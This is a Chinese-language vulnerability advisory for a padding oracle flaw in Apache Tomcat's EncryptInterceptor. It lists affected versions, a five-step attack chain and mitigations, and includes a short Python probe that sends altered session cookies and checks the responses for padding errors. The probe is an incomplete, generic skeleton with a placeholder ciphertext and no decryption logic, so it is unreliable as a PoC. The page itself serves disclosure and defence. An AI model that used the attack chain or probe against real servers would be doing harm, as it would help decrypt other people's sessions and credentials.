CVE-2026-29146 CVSS 7.5 高危

CVE-2026-29146 Apache Tomcat Padding Oracle漏洞

披露日期: 2026-04-09

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-29146

漏洞类型

Padding Oracle

CVSS评分

7.5 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Apache Tomcat

漏洞概述

Apache Tomcat的EncryptInterceptor组件在默认配置下存在Padding Oracle漏洞。由于未正确处理解密填充错误，未经身份验证的远程攻击者可利用该漏洞解密网络流量中的敏感数据。该漏洞影响范围广泛，涵盖Tomcat 7.x至11.x的多个版本，建议管理员尽快升级至官方发布的修复版本以消除安全隐患。

技术细节

该漏洞源于Apache Tomcat中EncryptInterceptor在处理加密数据时的逻辑缺陷。当组件使用分组密码（如AES）模式时，如果未能正确隐藏填充校验失败的信息，就会产生Padding Oracle。在默认配置下，EncryptInterceptor对填充错误的响应与正常解密失败存在差异。攻击者可以利用这种差异，通过发送大量特制的加密密文并分析服务器的反馈，执行Padding Oracle攻击。攻击者可以逐字节地推导出原始明文内容，例如会话ID、用户凭证或其他敏感的传输数据。由于该漏洞无需身份认证且网络攻击复杂度低，攻击者可轻易远程利用此漏洞解密通信流量，严重威胁数据的机密性。

攻击链分析

STEP 1

1. 信息收集

攻击者扫描并识别目标服务器是否使用了受影响版本的Apache Tomcat，并确认EncryptInterceptor是否处于开启状态。

STEP 2

2. 流量截获

攻击者截获客户端与服务器之间通过EncryptInterceptor加密的流量，获取密文数据（如Session ID）。

STEP 3

3. Oracle探测

攻击者向服务器发送经过修改的密文数据块，观察服务器响应（如状态码、错误信息或响应时间），判断填充是否正确。

STEP 4

4. 明文推导

利用Padding Oracle攻击算法，根据探测结果逐字节推导出原始密文对应的明文内容。

STEP 5

5. 数据利用

利用解密出的敏感信息（如用户凭证、会话Token）进一步接管用户账户或获取系统权限。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import binascii

# Proof of Concept Concept for Padding Oracle
# This script demonstrates how to detect a padding oracle vulnerability.

TARGET_URL = "http://target-tomcat:8080/encrypted-endpoint"
ENCRYPTED_COOKIE = "..." # Replace with actual encrypted cookie/header

def check_oracle(ciphertext):
    headers = {'Cookie': f'JSESSIONID={ciphertext}'}
    try:
        response = requests.get(TARGET_URL, headers=headers, timeout=5)
        # Analyze response: Different status codes or response times indicate an oracle
        if response.status_code == 500 and "padding" in response.text.lower():
            return True # Padding error detected
        elif response.status_code == 200:
            return False # Valid padding (or handled error)
    except Exception as e:
        print(f"Error: {e}")
    return None

# In a real attack, an attacker would modify the ciphertext byte by byte
# and use the check_oracle function to deduce the plaintext.
print("Starting Padding Oracle detection...")
# Example logic to flip bytes (simplified)
block = binascii.unhexlify(ENCRYPTED_COOKIE)
print(f"Testing block: {block}")
# ... full decryption logic would go here ...
print("PoC execution completed.")

影响范围

Apache Tomcat 11.0.0-M1 至 11.0.18

Apache Tomcat 10.0.0-M1 至 10.1.52

Apache Tomcat 9.0.13 至 9.0.115

Apache Tomcat 8.5.38 至 8.5.100

Apache Tomcat 7.0.100 至 7.0.109

防御指南

临时缓解措施

在未升级前，管理员可以通过修改配置禁用EncryptInterceptor以规避风险，或者配置反向代理/防火墙规则，限制对特定端口的访问，减少攻击面。同时，应监控异常的网络流量和解密错误日志。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表